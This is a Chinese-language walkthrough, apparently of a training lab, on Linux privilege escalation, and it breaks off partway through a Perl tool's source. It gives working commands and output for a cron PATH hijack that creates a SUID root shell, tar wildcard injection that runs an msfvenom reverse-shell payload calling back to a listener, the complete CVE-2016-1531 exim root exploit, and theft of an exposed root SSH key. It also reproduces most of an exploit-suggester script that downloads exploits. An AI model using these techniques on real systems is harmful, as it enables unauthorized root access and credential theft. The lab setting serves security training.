Linux提权(二)
计划任务——path环境变量
在crontab计划任务中存在path变量,以/home/user开头,在主目录创建一个overwrite.sh的文件,内容如下:
#!/bin/bash
cp /bin/bash /tmp/rootbash
chmod +xs /tmp/rootbash
给文件增加执行权限
chmod +x overwrite.sh
计划任务执行后/tmp会生成一个rootbash执行文件
user@debian:~$ ls -al /tmp
total 1024
drwxrwxrwt 2 root root 4096 Jan 4 21:40 .
drwxr-xr-x 22 root root 4096 Aug 25 2019 ..
-rw-r--r-- 1 root root 94613 Jan 4 21:40 backup.tar.gz
-rwsr-sr-x 1 root root 926536 Jan 4 21:38 rootbash
-rw-r--r-- 1 root root 28 Jan 4 21:37 useless
运行/tmp/rootbash,等待crontab计划任务运行
user@debian:~$ /tmp/rootbash -p
rootbash-4.1# id
uid=1000(user) gid=1000(user) euid=0(root) egid=0(root) groups=0(root),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),1000(user)
计划任务——通配符
在crontab计划任务中还存在另一个文件compress.sh,内容如下:
user@debian:~$ cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.
SHELL=/bin/sh
PATH=/home/user:/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
* * * * * root overwrite.sh
* * * * * root /usr/local/bin/compress.sh
user@debian:~$ cat /usr/local/bin/compress.sh
#!/bin/sh
cd /home/user
tar czf /tmp/backup.tar.gz *
在compress.sh文件中tar命令存在通配符(*),根据资料得知tar可用于生成交互式shell突破受限环境(https://gtfobins.github.io/gtfobins/tar/)
使用msf生成一个反向shell ELF文件
┌──(root㉿kali)-[~]
└─# msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.2.98.234 LPORT=4444 -f elf -o shell.elf
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 74 bytes
Final size of elf file: 194 bytes
Saved as: shell.elf
使用scp传输文件
scp shell.elf [email protected]:shell.elf
[email protected]'s password:
shell.elf
直接使用scp传输文件会出现错误
scp shell.elf [email protected]:shell.elf
Unable to negotiate with 10.10.46.24 port 22: no matching host key type found. Their offer: ssh-rsa,ssh-dss
scp: Connection closed
在ssh目录下添加config配置文件,内容如下:
HostKeyAlgorithms +ssh-rsa
现在就可以传输文件了
给文件增加执行权限并创建文件
user@debian:~$ chmod +x shell.elf
user@debian:~$ touch /home/user/--checkpoint=1
user@debian:~$ touch /home/user/--checkpoint-action=exec=shell.elf
当 cron 作业中的 tar 命令运行时,通配符 (*) 将扩展以包含这些文件。由于它们的文件名是有效的 tar 命令行选项,因此 tar 会识别它们并将它们视为命令行选项而不是文件名。
kali开启监听
# nc -nvlp 4444
listening on [any] 4444 ...
connect to [10.2.98.234] from (UNKNOWN) [10.10.46.24] 39604
id
uid=0(root) gid=0(root) groups=0(root)
已知漏洞
查找所有SUID/SGID可执行文件
user@debian:~$ find / -type f -a ( -perm -u+s -o -perm -g+s ) -exec ls -l {} ; 2> /dev/null
-rwxr-sr-x 1 root shadow 19528 Feb 15 2011 /usr/bin/expiry
-rwxr-sr-x 1 root ssh 108600 Apr 2 2014 /usr/bin/ssh-agent
-rwsr-xr-x 1 root root 37552 Feb 15 2011 /usr/bin/chsh
-rwsr-xr-x 2 root root 168136 Jan 5 2016 /usr/bin/sudo
-rwxr-sr-x 1 root tty 11000 Jun 17 2010 /usr/bin/bsd-write
-rwxr-sr-x 1 root crontab 35040 Dec 18 2010 /usr/bin/crontab
-rwsr-xr-x 1 root root 32808 Feb 15 2011 /usr/bin/newgrp
-rwsr-xr-x 2 root root 168136 Jan 5 2016 /usr/bin/sudoedit
-rwxr-sr-x 1 root shadow 56976 Feb 15 2011 /usr/bin/chage
-rwsr-xr-x 1 root root 43280 Feb 15 2011 /usr/bin/passwd
-rwsr-xr-x 1 root root 60208 Feb 15 2011 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 39856 Feb 15 2011 /usr/bin/chfn
-rwxr-sr-x 1 root tty 12000 Jan 25 2011 /usr/bin/wall
-rwsr-sr-x 1 root staff 9861 May 14 2017 /usr/local/bin/suid-so
-rwsr-sr-x 1 root staff 6883 May 14 2017 /usr/local/bin/suid-env
-rwsr-sr-x 1 root staff 6899 May 14 2017 /usr/local/bin/suid-env2
-rwsr-xr-x 1 root root 963691 May 13 2017 /usr/sbin/exim-4.84-3
-rwsr-xr-x 1 root root 6776 Dec 19 2010 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x 1 root root 212128 Apr 2 2014 /usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 10592 Feb 15 2016 /usr/lib/pt_chown
-rwsr-xr-x 1 root root 36640 Oct 14 2010 /bin/ping6
-rwsr-xr-x 1 root root 34248 Oct 14 2010 /bin/ping
-rwsr-xr-x 1 root root 78616 Jan 25 2011 /bin/mount
-rwsr-xr-x 1 root root 34024 Feb 15 2011 /bin/su
-rwsr-xr-x 1 root root 53648 Jan 25 2011 /bin/umount
-rwxr-sr-x 1 root shadow 31864 Oct 17 2011 /sbin/unix_chkpwd
-rwsr-xr-x 1 root root 94992 Dec 13 2014 /sbin/mount.nfs
在结果中存在一个/usr/sbin/exim-4.84-3,查询得知此版本存在漏洞可用于提权(https://www.exploit-db.com/exploits/39535)
user@debian:~/tools/suid/exim$ ls
cve-2016-1531.sh
user@debian:~/tools/suid/exim$ cat cve-2016-1531.sh
#!/bin/sh
# CVE-2016-1531 exim <= 4.84-3 local root exploit
# ===============================================
# you can write files as root or force a perl module to
# load by manipulating the perl environment and running
# exim with the "perl_startup" arguement -ps.
#
# e.g.
# [fantastic@localhost tmp]$ ./cve-2016-1531.sh
# [ CVE-2016-1531 local root exploit
# sh-4.3# id
# uid=0(root) gid=1000(fantastic) groups=1000(fantastic)
#
# -- Hacker Fantastic
echo [ CVE-2016-1531 local root exploit
cat > /tmp/root.pm << EOF
package root;
use strict;
use warnings;
system("/bin/sh");
EOF
PERL5LIB=/tmp PERL5OPT=-Mroot /usr/exim/bin/exim -ps
执行脚本可得到root权限shell
user@debian:~/tools/suid/exim$ ./cve-2016-1531.sh
[ CVE-2016-1531 local root exploit
sh-4.1# id
uid=0(root) gid=1000(user) groups=0(root)
历史命令/配置文件
查看历史命令/配置文件或许会有意外收获
cat ~/.*history | less
SSH秘钥
在系统根目录下看到存在.ssh的隐藏目录,查看下内容
user@debian:~$ ls -al /
total 96
drwxr-xr-x 22 root root 4096 Aug 25 2019 .
drwxr-xr-x 22 root root 4096 Aug 25 2019 ..
drwxr-xr-x 2 root root 4096 Aug 25 2019 bin
drwxr-xr-x 3 root root 4096 May 12 2017 boot
drwxr-xr-x 12 root root 2820 Jan 5 00:13 dev
drwxr-xr-x 67 root root 4096 Jan 5 01:04 etc
drwxr-xr-x 3 root root 4096 May 15 2017 home
lrwxrwxrwx 1 root root 30 May 12 2017 initrd.img -> boot/initrd.img-2.6.32-5-amd64
drwxr-xr-x 12 root root 12288 May 14 2017 lib
lrwxrwxrwx 1 root root 4 May 12 2017 lib64 -> /lib
drwx------ 2 root root 16384 May 12 2017 lost+found
drwxr-xr-x 3 root root 4096 May 12 2017 media
drwxr-xr-x 2 root root 4096 Jun 11 2014 mnt
drwxr-xr-x 2 root root 4096 May 12 2017 opt
dr-xr-xr-x 96 root root 0 Jan 5 00:10 proc
drwx------ 5 root root 4096 May 15 2020 root
drwxr-xr-x 2 root root 4096 May 13 2017 sbin
drwxr-xr-x 2 root root 4096 Jul 21 2010 selinux
drwxr-xr-x 2 root root 4096 May 12 2017 srv
drwxr-xr-x 2 root root 4096 Aug 25 2019 .ssh
drwxr-xr-x 13 root root 0 Jan 5 00:10 sys
drwxrwxrwt 2 root root 4096 Jan 5 01:15 tmp
drwxr-xr-x 11 root root 4096 May 13 2017 usr
drwxr-xr-x 14 root root 4096 May 13 2017 var
lrwxrwxrwx 1 root root 27 May 12 2017 vmlinuz -> boot/vmlinuz-2.6.32-5-amd64
user@debian:~$ ls -al /.ssh
total 12
drwxr-xr-x 2 root root 4096 Aug 25 2019 .
drwxr-xr-x 22 root root 4096 Aug 25 2019 ..
-rw-r--r-- 1 root root 1679 Aug 25 2019 root_key
存在一个文件root_key,复制文件到kali
┌──(root㉿kali)-[~]
└─# scp -r [email protected]:/.ssh/root_key /
[email protected]'s password:
root_key 100% 1679 2.1KB/s 00:00
┌──(root㉿kali)-[~]
└─# ls -al /
total 1048748
drwxr-xr-x 19 root root 4096 Jan 5 01:51 .
drwxr-xr-x 19 root root 4096 Jan 5 01:51 ..
---s--s--x 1 root root 77304 Dec 28 01:48 agetty
lrwxrwxrwx 1 root root 7 Nov 30 11:35 bin -> usr/bin
drwxr-xr-x 3 root root 4096 Dec 21 22:27 boot
drwxr-xr-x 17 root root 3440 Jan 5 01:26 dev
drwxr-xr-x 183 root root 12288 Jan 5 01:26 etc
drwxr-xr-x 3 root root 4096 Nov 30 11:56 home
lrwxrwxrwx 1 root root 33 Nov 30 14:51 initrd.img -> boot/initrd.img-6.5.0-kali3-amd64
lrwxrwxrwx 1 root root 33 Nov 30 14:51 initrd.img.old -> boot/initrd.img-6.5.0-kali3-amd64
lrwxrwxrwx 1 root root 7 Nov 30 11:35 lib -> usr/lib
lrwxrwxrwx 1 root root 9 Nov 30 11:48 lib32 -> usr/lib32
lrwxrwxrwx 1 root root 9 Nov 30 11:35 lib64 -> usr/lib64
drwx------ 2 root root 16384 Nov 30 14:46 lost+found
drwxr-xr-x 2 root root 4096 Nov 30 11:35 media
drwxr-xr-x 2 root root 4096 Nov 30 11:35 mnt
drwxr-xr-x 3 root root 4096 Nov 30 11:48 opt
dr-xr-xr-x 298 root root 0 Dec 29 02:06 proc
drwxr-xr-x 15 root root 4096 Jan 3 03:26 redteam
drwx------ 14 root root 4096 Jan 5 01:51 root
-rw-r--r-- 1 root root 1679 Jan 5 01:51 root_key
drwxr-xr-x 33 root root 820 Dec 29 02:07 run
lrwxrwxrwx 1 root root 8 Nov 30 11:35 sbin -> usr/sbin
drwxr-xr-x 3 root root 4096 Nov 30 11:52 srv
-rw------- 1 root root 1073741824 Nov 30 14:50 swapfile
dr-xr-xr-x 13 root root 0 Dec 29 02:06 sys
drwxrwxrwt 18 root root 12288 Jan 5 01:39 tmp
drwxr-xr-x 15 root root 4096 Nov 30 11:48 usr
drwxr-xr-x 12 root root 4096 Dec 14 03:50 var
lrwxrwxrwx 1 root root 30 Nov 30 14:51 vmlinuz -> boot/vmlinuz-6.5.0-kali3-amd64
lrwxrwxrwx 1 root root 30 Nov 30 14:51 vmlinuz.old -> boot/vmlinuz-6.5.0-kali3-amd64
将root_key移动到/root/.ssh目录下并设置权限
┌──(root㉿kali)-[~/.ssh]
└─# ls
config known_hosts known_hosts.old root_key
┌──(root㉿kali)-[~/.ssh]
└─# chmod 600 root_key
ssh秘钥连接至测试机
┌──(root㉿kali)-[~/.ssh]
└─# ssh -i root_key -oPubkeyAcceptedKeyTypes=+ssh-rsa -oHostKeyAlgorithms=+ssh-rsa [email protected]
Linux debian 2.6.32-5-amd64 #1 SMP Tue May 13 16:34:35 UTC 2014 x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sun Aug 25 14:02:49 2019 from 192.168.1.2
root@debian:~# id
uid=0(root) gid=0(root) groups=0(root)
内核漏洞
内核漏洞可能会使系统处于不稳定状态,运行Linux Exploit Suggester 2工具来检测当前系统上潜在的内核漏洞(https://github.com/InteliSecureLabs/Linux_Exploit_Suggester)
user@debian:~/tools/kernel-exploits/linux-exploit-suggester-2$ cat linux-exploit-suggester-2.pl
#!/usr/bin/perl
use strict;
use warnings;
use Getopt::Std;
our $VERSION = '2';
my %opts;
getopts( 'k:hd', %opts );
if (exists $opts{h}) {
usage();
exit;
};
print_banner();
my ( $khost, $is_partial ) = get_kernel();
print " Local Kernel: e[00;33m$khoste[00mn";
my %exploits = get_exploits();
print ' Searching ' . scalar keys(%exploits) . " exploits...nn";
print " e[1;35mPossible Exploitse[00mn";
my $count = 1;
my @applicable = ();
EXPLOIT:
foreach my $key ( sort keys %exploits ) {
foreach my $kernel ( @{ $exploits{$key}{vuln} } ) {
if ( $khost eq $kernel
or ( $is_partial and index($kernel,$khost) == 0 )
) {
$exploits{$key}{key} = $key;
push(@applicable, $exploits{$key});
print " e[00;33m[e[00me[00;31m$counte[00me[00;33m]e[00m ";
print "e[00;33m$keye[00m";
print " e[00;33m($kernel)e[00m" if $is_partial;
my $alt = $exploits{$key}{alt};
my $cve = $exploits{$key}{cve};
my $mlw = $exploits{$key}{mil};
if ( $alt or $cve ) {
print "n";
}
if ( $alt ) { print " Alt: $alt "; }
if ( $cve ) { print " CVE-$cve"; }
if ( $mlw ) { print "n Source: $mlw"; }
print "n";
$count += 1;
next EXPLOIT;
}
}
}
print "n";
if (!@applicable) {
print " No exploits are available for this kernel versionnn";
exit;
}
if (exists $opts{d}) {
print " e[1;36mExploit Downloade[00mn";
print " (Download all: e[00;33m'a'e[00m / Individually: e[00;33m'2,4,5'e[00m ";
print "/ Exit: e[00;33m^ce[00m)n";
print " Select exploits to download: ";
while (1) {
my $input = <STDIN>;
$input =~ s/s+//g;
if ($input =~ /^a$/) {
my @selected = ();
for (my $i=1; $i <= scalar @applicable; $i++) {
push(@selected, $i);
}
download_exploits(@selected, @applicable);
last;
}
elsif ($input =~ /^(0|[1-9][0-9]*)(,(0|[1-9][0-9]*))*$/) {
my @selected = uniq(split(',', $input));
@selected = sort {$a <=> $b} @selected;
if ($selected[0] > 0 && $selected[-1] <= scalar @applicable) {
download_exploits(@selected, @applicable);
last;
}
else {
print " e[00;31mInput is out of range.e[00m Select exploits to download: ";
}
}
else {
print " e[00;31mInvalid input.e[00m Select exploits to download: ";
}
}
};
exit;
######################
## extra functions ##
######################
sub get_kernel {
my $khost = '';
if ( exists $opts{k} ) {
$khost = $opts{k};
}
else {
$khost = `uname -r |cut -d"-" -f1`;
chomp $khost;
}
if (!defined $khost || !($khost =~ /^[0-9]+([.][0-9]+)*$/)) {
print " e[00;31mSpecified kernel is in the wrong formate[00mn";
print " Try a kernel format like this: 3.2.0nn";
exit;
}
# partial kernels might be provided by the user,
# such as '2.4' or '2.6.'
my $is_partial = $khost =~ /^d+.d+.d?/ ? 0 : 1;
return ( $khost, $is_partial );
}
sub download_exploits {
my ($sref, $aref) = @_;
my @selected = @{ $sref };
my @applicable = @{ $aref };
my $exploit_base = "www.exploit-db.com/exploits";
my $download_base = "https://www.exploit-db.com/raw/";
print "n";
foreach my $num (@selected) {
my $mil = $applicable[$num-1]{mil};
next if (!defined $mil);
my ($exploit_num) = ($mil =~ /^.*/([1-9][0-9]*)/?$/);
if ($exploit_num && index($mil, $exploit_base) != -1) {
my $url = $download_base . $exploit_num;
my $file = "exploit_$applicable[$num-1]{key}";
print " Downloading e[00;33m$urle[00m -> e[00;33m$filee[00mn";
system "wget $url -O $file > /dev/null 2>&1";
}
else {
print " No exploit code available for e[00;33m$applicable[$num-1]{key}e[00mn";
}
}
print "n";
}
sub uniq {
my %seen;
grep !$seen{$_}++, @_;
}
sub usage {
print_banner();
print " e[00;35mUsage:e[00m $0 [-h] [-k kernel] [-d]nn";
print " e[00;33m[e[00me[00;31m-he[00me[00;33m]e[00m Help (this message)n";
print " e[00;33m[e[00me[00;31m-ke[00me[00;33m]e[00m Kernel number (eg. 2.6.28)n";
print " e[00;33m[e[00me[00;31m-de[00me[00;33m]e[00m Open exploit download menunn";
print " You can also provide a partial kernel version (eg. 2.4)n";
print " to see all exploits available.nn";
}
sub print_banner {
print "ne[00;33m #############################e[00mn";
print "e[1;31m Linux Exploit Suggester $VERSIONe[00mn";
print "e[00;33m #############################e[00mnn";
}
sub get_exploits {
return (
'w00t' => {
vuln => [
'2.4.10', '2.4.16', '2.4.17', '2.4.18',
'2.4.19', '2.4.20', '2.4.21',
]
},
'brk' => {
vuln => [ '2.4.10', '2.4.18', '2.4.19', '2.4.20', '2.4.21', '2.4.22' ],
},
'ave' => { vuln => [ '2.4.19', '2.4.20' ] },
'elflbl' => {
vuln => ['2.4.29'],
mil => 'http://www.exploit-db.com/exploits/744',
},
'elfdump' => { vuln => ['2.4.27'] },
'elfcd' => { vuln => ['2.6.12'] },
'expand_stack' => { vuln => ['2.4.29'] },
'h00lyshit' => {
vuln => [
'2.6.8', '2.6.10', '2.6.11', '2.6.12',
'2.6.13', '2.6.14', '2.6.15', '2.6.16',
],
cve => '2006-3626',
mil => 'http://www.exploit-db.com/exploits/2013',
},
'kdump' => { vuln => ['2.6.13'] },
'km2' => { vuln => [ '2.4.18', '2.4.22' ] },
'krad' =>
{ vuln => [ '2.6.5', '2.6.7', '2.6.8', '2.6.9', '2.6.10', '2.6.11' ] },
'krad3' => {
vuln => [ '2.6.5', '2.6.7', '2.6.8', '2.6.9', '2.6.10', '2.6.11' ],
mil => 'http://exploit-db.com/exploits/1397',
},
'local26' => { vuln => ['2.6.13'] },
'loko' => { vuln => [ '2.4.22', '2.4.23', '2.4.24' ] },
'mremap_pte' => {
vuln => [ '2.4.20', '2.2.24', '2.4.25', '2.4.26', '2.4.27' ],
mil => 'http://www.exploit-db.com/exploits/160',
},
'newlocal' => { vuln => [ '2.4.17', '2.4.19' ] },
'ong_bak' => { vuln => ['2.6.5'] },
'ptrace' =>
{ vuln => [ '2.4.18', '2.4.19', '2.4.20', '2.4.21', '2.4.22' ] },
'ptrace_kmod' => {
vuln => [ '2.4.18', '2.4.19', '2.4.20', '2.4.21', '2.4.22' ],
cve => '2007-4573',
},
'ptrace_kmod2' => {
vuln => [
'2.6.26', '2.6.27', '2.6.28', '2.6.29', '2.6.30', '2.6.31',
'2.6.32', '2.6.33', '2.6.34',
],
alt => 'ia32syscall,robert_you_suck',
mil => 'http://www.exploit-db.com/exploits/15023',
cve => '2010-3301',
},
'ptrace24' => { vuln => ['2.4.9'] },
'pwned' => { vuln => ['2.6.11'] },
'py2' => { vuln => [ '2.6.9', '2.6.17', '2.6.15', '2.6.13' ] },
'raptor_prctl' => {
vuln => [ '2.6.13', '2.6.14', '2.6.15', '2.6.16', '2.6.17' ],
cve => '2006-2451',
mil => 'http://www.exploit-db.com/exploits/2031',
},
'prctl' => {
vuln => [ '2.6.13', '2.6.14', '2.6.15', '2.6.16', '2.6.17' ],
mil => 'http://www.exploit-db.com/exploits/2004',
},
'prctl2' => {
vuln => [ '2.6.13', '2.6.14', '2.6.15', '2.6.16', '2.6.17' ],
mil => 'http://www.exploit-db.com/exploits/2005',
},
'prctl3' => {
vuln => [ '2.6.13', '2.6.14', '2.6.15', '2.6.16', '2.6.17' ],
mil => 'http://www.exploit-db.com/exploits/2006',
},
'prctl4' => {
vuln => [ '2.6.13', '2.6.14', '2.6.15', '2.6.16', '2.6.17' ],
mil => 'http://www.exploit-db.com/exploits/2011',
},
'remap' => { vuln => ['2.4'] },
'rip' => { vuln => ['2.2'] },
'stackgrow2' => { vuln => [ '2.4.29', '2.6.10' ] },
'uselib24' => {
vuln => [ '2.6.10', '2.4.17', '2.4.22', '2.4.25', '2.4.27', '2.4.29' ]
},
'newsmp' => { vuln => ['2.6'] },
'smpracer' => { vuln => ['2.4.29'] },
'loginx' => { vuln => ['2.4.22'] },
'exp.sh' => { vuln => [ '2.6.9', '2.6.10', '2.6.16', '2.6.13' ] },
'vmsplice1' => {
vuln => [
'2.6.17', '2.6.18', '2.6.19', '2.6.20', '2.6.21', '2.6.22',
'2.6.23', '2.6.24', '2.6.24.1',
],
alt => 'jessica biel',
cve => '2008-0600',
mil => 'http://www.exploit-db.com/exploits/5092',
},
'vmsplice2' => {
vuln => [ '2.6.23', '2.6.24' ],
alt => 'diane_lane',
cve => '2008-0600',
mil => 'http://www.exploit-db.com/exploits/5093',
},
'vconsole' => {
vuln => ['2.6'],
cve => '2009-1046',
},
'sctp' => {
vuln => ['2.6.26'],
cve => '2008-4113',
},
'ftrex' => {
vuln => [
'2.6.11', '2.6.12', '2.6.13', '2.6.14', '2.6.15', '2.6.16',
'2.6.17', '2.6.18', '2.6.19', '2.6.20', '2.6.21', '2.6.22',
],
cve => '2008-4210',
mil => 'http://www.exploit-db.com/exploits/6851',
},
'exit_notify' => {
vuln => [ '2.6.25', '2.6.26', '2.6.27', '2.6.28', '2.6.29' ],
mil => 'http://www.exploit-db.com/exploits/8369',
},
'udev' => {
vuln => [ '2.6.25', '2.6.26', '2.6.27', '2.6.28', '2.6.29' ],
alt => 'udev <1.4.1',
cve => '2009-1185',
mil => 'http://www.exploit-db.com/exploits/8478',
},
'sock_sendpage2' => {
vuln => [
'2.4.4', '2.4.5', '2.4.6', '2.4.7', '2.4.8', '2.4.9',
'2.4.10', '2.4.11', '2.4.12', '2.4.13', '2.4.14', '2.4.15',
'2.4.16', '2.4.17', '2.4.18', '2.4.19', '2.4.20', '2.4.21',
'2.4.22', '2.4.23', '2.4.24', '2.4.25', '2.4.26', '2.4.27',
'2.4.28', '2.4.29', '2.4.30', '2.4.31', '2.4.32', '2.4.33',
'2.4.34', '2.4.35', '2.4.36', '2.4.37', '2.6.0', '2.6.1',
'2.6.2', '2.6.3', '2.6.4', '2.6.5', '2.6.6', '2.6.7',
'2.6.8', '2.6.9', '2.6.10', '2.6.11', '2.6.12', '2.6.13',
'2.6.14', '2.6.15', '2.6.16', '2.6.17', '2.6.18', '2.6.19',
'2.6.20', '2.6.21', '2.6.22', '2.6.23', '2.6.24', '2.6.25',
'2.6.26', '2.6.27', '2.6.28', '2.6.29', '2.6.30',
],
alt => 'proto_ops',
cve => '2009-2692',
mil => 'http://www.exploit-db.com/exploits/9436',
},
'sock_sendpage' => {
vuln => [
'2.4.4', '2.4.5', '2.4.6', '2.4.7', '2.4.8', '2.4.9',
'2.4.10', '2.4.11', '2.4.12', '2.4.13', '2.4.14', '2.4.15',
'2.4.16', '2.4.17', '2.4.18', '2.4.19', '2.4.20', '2.4.21',
'2.4.22', '2.4.23', '2.4.24', '2.4.25', '2.4.26', '2.4.27',
'2.4.28', '2.4.29', '2.4.30', '2.4.31', '2.4.32', '2.4.33',
'2.4.34', '2.4.35', '2.4.36', '2.4.37', '2.6.0', '2.6.1',
'2.6.2', '2.6.3', '2.6.4', '2.6.5', '2.6.6', '2.6.7',
'2.6.8', '2.6.9', '2.6.10', '2.6.11', '2.6.12', '2.6.13',
'2.6.14', '2.6.15', '2.6.16', '2.6.17', '2.6.18', '2.6.19',
'2.6.20', '2.6.21', '2.6.22', '2.6.23', '2.6.24', '2.6.25',
'2.6.26', '2.6.27', '2.6.28', '2.6.29', '2.6.30',
],
alt => 'wunderbar_emporium',
cve => '2009-2692',
mil => 'http://www.exploit-db.com/exploits/9435',
},
'udp_sendmsg_32bit' => {
vuln => [
'2.6.1', '2.6.2', '2.6.3', '2.6.4', '2.6.5', '2.6.6',
'2.6.7', '2.6.8', '2.6.9', '2.6.10', '2.6.11', '2.6.12',
'2.6.13', '2.6.14', '2.6.15', '2.6.16', '2.6.17', '2.6.18',
'2.6.19',
],
cve => '2009-2698',
mil =>
'http://downloads.securityfocus.com/vulnerabilities/exploits/36108.c',
},
'pipe.c_32bit' => {
vuln => [
'2.4.4', '2.4.5', '2.4.6', '2.4.7', '2.4.8', '2.4.9',
'2.4.10', '2.4.11', '2.4.12', '2.4.13', '2.4.14', '2.4.15',
'2.4.16', '2.4.17', '2.4.18', '2.4.19', '2.4.20', '2.4.21',
'2.4.22', '2.4.23', '2.4.24', '2.4.25', '2.4.26', '2.4.27',
'2.4.28', '2.4.29', '2.4.30', '2.4.31', '2.4.32', '2.4.33',
'2.4.34', '2.4.35', '2.4.36', '2.4.37', '2.6.15', '2.6.16',
'2.6.17', '2.6.18', '2.6.19', '2.6.20', '2.6.21', '2.6.22',
'2.6.23', '2.6.24', '2.6.25', '2.6.26', '2.6.27', '2.6.28',
'2.6.29', '2.6.30', '2.6.31',
],
cve => '2009-3547',
mil =>
'http://www.securityfocus.com/data/vulnerabilities/exploits/36901-1.c',
},
'do_pages_move' => {
vuln => [
'2.6.18', '2.6.19', '2.6.20', '2.6.21', '2.6.22', '2.6.23',
'2.6.24', '2.6.25', '2.6.26', '2.6.27', '2.6.28', '2.6.29',
'2.6.30', '2.6.31',
],
alt => 'sieve',
cve => '2010-0415',
mil => 'Spenders Enlightenment',
},
'reiserfs' => {
vuln => [
'2.6.18', '2.6.19', '2.6.20', '2.6.21', '2.6.22', '2.6.23',
'2.6.24', '2.6.25', '2.6.26', '2.6.27', '2.6.28', '2.6.29',
'2.6.30', '2.6.31', '2.6.32', '2.6.33', '2.6.34',
],
cve => '2010-1146',
mil => 'http://www.exploit-db.com/exploits/12130',
},
'can_bcm' => {
vuln => [
'2.6.18', '2.6.19', '2.6.20', '2.6.21', '2.6.22', '2.6.23',
'2.6.24', '2.6.25', '2.6.26', '2.6.27', '2.6.28', '2.6.29',
'2.6.30', '2.6.31', '2.6.32', '2.6.33', '2.6.34', '2.6.35',
'2.6.36',
],
cve => '2010-2959',
mil => 'http://www.exploit-db.com/exploits/14814',
},
'rds' => {
vuln => [
'2.6.30', '2.6.31', '2.6.32', '2.6.33',
'2.6.34', '2.6.35', '2.6.36',
],
mil => 'http://www.exploit-db.com/exploits/15285',
cve => '2010-3904',
},
'half_nelson1' => {
vuln => [
'2.6.0', '2.6.1', '2.6.2', '2.6.3', '2.6.4', '2.6.5',
'2.6.6', '2.6.7', '2.6.8', '2.6.9', '2.6.10', '2.6.11',
'2.6.12', '2.6.13', '2.6.14', '2.6.15', '2.6.16', '2.6.17',
'2.6.18', '2.6.19', '2.6.20', '2.6.21', '2.6.22', '2.6.23',
'2.6.24', '2.6.25', '2.6.26', '2.6.27', '2.6.28', '2.6.29',
'2.6.30', '2.6.31', '2.6.32', '2.6.33', '2.6.34', '2.6.35',
'2.6.36',
],
alt => 'econet',
cve => '2010-3848',
mil => 'http://www.exploit-db.com/exploits/17787',
},
'half_nelson2' => {
vuln => [
'2.6.0', '2.6.1', '2.6.2', '2.6.3', '2.6.4', '2.6.5',
'2.6.6', '2.6.7', '2.6.8', '2.6.9', '2.6.10', '2.6.11',
'2.6.12', '2.6.13', '2.6.14', '2.6.15', '2.6.16', '2.6.17',
'2.6.18', '2.6.19', '2.6.20', '2.6.21', '2.6.22', '2.6.23',
'2.6.24', '2.6.25', '2.6.26', '2.6.27', '2.6.28', '2.6.29',
'2.6.30', '2.6.31', '2.6.32', '2.6.33', '2.6.34', '2.6.35',
'2.6.36',
],
alt => 'econet',
cve => '2010-3850',
mil => 'http://www.exploit-db.com/exploits/17787',
},
'half_nelson3' => {
vuln => [
'2.6.0', '2.6.1', '2.6.2', '2.6.3', '2.6.4', '2.6.5',
'2.6.6', '2.6.7', '2.6.8', '2.6.9', '2.6.10', '2.6.11',
'2.6.12', '2.6.13', '2.6.14', '2.6.15', '2.6.16', '2.6.17',
'2.6.18', '2.6.19', '2.6.20', '2.6.21', '2.6.22', '2.6.23',
'2.6.24', '2.6.25', '2.6.26', '2.6.27', '2.6.28', '2.6.29',
'2.6.30', '2.6.31', '2.6.32', '2.6.33', '2.6.34', '2.6.35',
'2.6.36',
],
alt => 'econet',
cve => '2010-4073',
mil => 'http://www.exploit-db.com/exploits/17787',
},
'caps_to_root' => {
vuln => [ '2.6.34', '2.6.35', '2.6.36' ],
cve => 'n/a',
mil => 'http://www.exploit-db.com/exploits/15916',
},
'american-sign-language' => {
vuln => [
'2.6.0', '2.6.1', '2.6.2', '2.6.3', '2.6.4', '2.6.5',
'2.6.6', '2.6.7', '2.6.8', '2.6.9', '2.6.10', '2.6.11',
'2.6.12', '2.6.13', '2.6.14', '2.6.15', '2.6.16', '2.6.17',
'2.6.18', '2.6.19', '2.6.20', '2.6.21', '2.6.22', '2.6.23',
'2.6.24', '2.6.25', '2.6.26', '2.6.27', '2.6.28', '2.6.29',
'2.6.30', '2.6.31', '2.6.32', '2.6.33', '2.6.34', '2.6.35',
'2.6.36',
],
cve => '2010-4347',
mil => 'http://www.securityfocus.com/bid/45408',
},
'pktcdvd' => {
vuln => [
'2.6.0', '2.6.1', '2.6.2', '2.6.3', '2.6.4', '2.6.5',
'2.6.6', '2.6.7', '2.6.8', '2.6.9', '2.6.10', '2.6.11',
'2.6.12', '2.6.13', '2.6.14', '2.6.15', '2.6.16', '2.6.17',
'2.6.18', '2.6.19', '2.6.20', '2.6.21', '2.6.22', '2.6.23',
'2.6.24', '2.6.25', '2.6.26', '2.6.27', '2.6.28', '2.6.29',
'2.6.30', '2.6.31', '2.6.32', '2.6.33', '2.6.34', '2.6.35',
'2.6.36',
],
cve => '2010-3437',
mil => 'http://www.exploit-db.com/exploits/15150',
},
'video4linux' => {
vuln => [
'2.6.0', '2.6.1', '2.6.2', '2.6.3', '2.6.4', '2.6.5',
'2.6.6', '2.6.7', '2.6.8', '2.6.9', '2.6.10', '2.6.11',
'2.6.12', '2.6.13', '2.6.14', '2.6.15', '2.6.16', '2.6.17',
'2.6.18', '2.6.19', '2.6.20', '2.6.21', '2.6.22', '2.6.23',
